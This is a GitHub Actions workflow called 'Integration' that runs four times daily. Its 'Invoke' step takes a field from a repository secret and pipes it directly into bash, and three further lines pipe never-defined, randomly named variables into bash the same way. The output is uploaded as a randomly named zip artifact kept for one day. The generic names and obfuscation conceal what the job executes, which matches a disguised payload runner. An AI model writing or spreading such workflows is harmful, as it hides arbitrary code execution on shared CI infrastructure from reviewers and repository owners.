name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '40 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  pipeline:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          jzy4: ${{ secrets.jzy4 }}
        run: |
          printf '%s' "$jzy4" | jq -r .iis0547 | /bin/bash
          printf '%s' "$wdcv169" | jq -r .cyhiv32 | /bin/bash
          printf '%s' "$s56652" | jq -r .vs334 | /bin/bash
          echo $dsrl110 | jq -r .ov2 | /bin/bash

      - name: Persist output
        if: ${{ always() }}
        uses: actions/upload-artifact@v4
        with:
          name: XLk8OTVn
          path: "*.zip"
          retention-days: 1
